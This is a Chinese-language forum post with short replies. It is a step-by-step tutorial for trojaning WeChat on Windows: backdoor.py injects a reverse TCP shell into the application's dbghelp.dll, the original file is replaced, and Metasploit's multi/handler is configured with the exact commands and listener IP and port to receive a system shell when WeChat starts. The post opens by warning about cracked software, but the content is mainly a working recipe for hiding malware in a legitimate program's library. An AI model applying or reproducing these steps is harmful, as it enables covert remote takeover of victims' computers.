Kali 笔记

搜索
查看: 3755|回复: 2

利用微信获取系统shell

  [复制链接]

561

主题

816

帖子

2093

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2093

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-6-19 20:01:59 | 显示全部楼层 |阅读模式
写在前面
通常情况下,我们会常常到网络中下载一些破解版的软件进行使用。在方便的时候也给我们带来了很多的网络安全隐患。今天我们来看看,攻击者是如何进行利用正常软件进行网络攻击的。
准备

运行Process Explorer查看微信运行时所有调用的文件
可以看到微信调用了很多他的配置文件,那么,我们能不能从他的配置文件下手呢?
我们定位到我们微信的安装目录C:\Program Files (x86)\Tencent\WeChat

既然微信调用了.dll的配置文件,我们可不可以将后门放到其配置文件中,运行微信后,微信会调用我们的配置文件。这样我们的后门也就启动了。
OK!既然如此,我们给其配置文件添加后门!这里我们以dbghelp.dll文件为列!这个因为是微信的帮助文件,当然我也试了下其他文件,当我们注入后门时,微信无法打开,估计是核心文件,一旦破坏就不能使用,但是像帮助文档的文件,即使破坏微信又能使用。

利用backdoor添加后门
python backdoor.py -f /root/msf/wx/dbghelp.dll  -s reverse_shell_tcp_inline -P 5555 -H 192.168.123.231

填坑时间:
kali默认安装了backdoor但是在生成的时候报错,不知道是那个的问题,我们从github下载最新的文件,直接执行上述命令即可。
-P:填写你的端口
-H:填写你的ip地址(可以是内网也可以是外网)

这里我们选择2选项,其他选项我们尝试,大家可以试试!
后门会生成在backdoored文件下

我们替换掉微信中的源文件(最好将源文件备份)


配置msfconsole

分别执行下面命令
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LPORT 5555
set lhost 192.168.123.231
exploit

启动微信后,我们成功获得系统shell



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

253

主题

358

帖子

797

积分

vip用户

Rank: 6Rank: 6

积分
797

注册会员活跃会员热心会员

QQ
发表于 2019-6-26 23:01:18 | 显示全部楼层
学习了,感谢大佬
有没有参加CTF比赛的,一起组队啊!
回复 支持 反对

使用道具 举报

0

主题

10

帖子

14

积分

vip用户

Rank: 6Rank: 6

积分
14
发表于 2020-4-7 10:03:37 | 显示全部楼层
这几天发现正版小红伞杀毒软件都被人干掉了,以前以为装了正版杀毒就天不怕地不怕
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表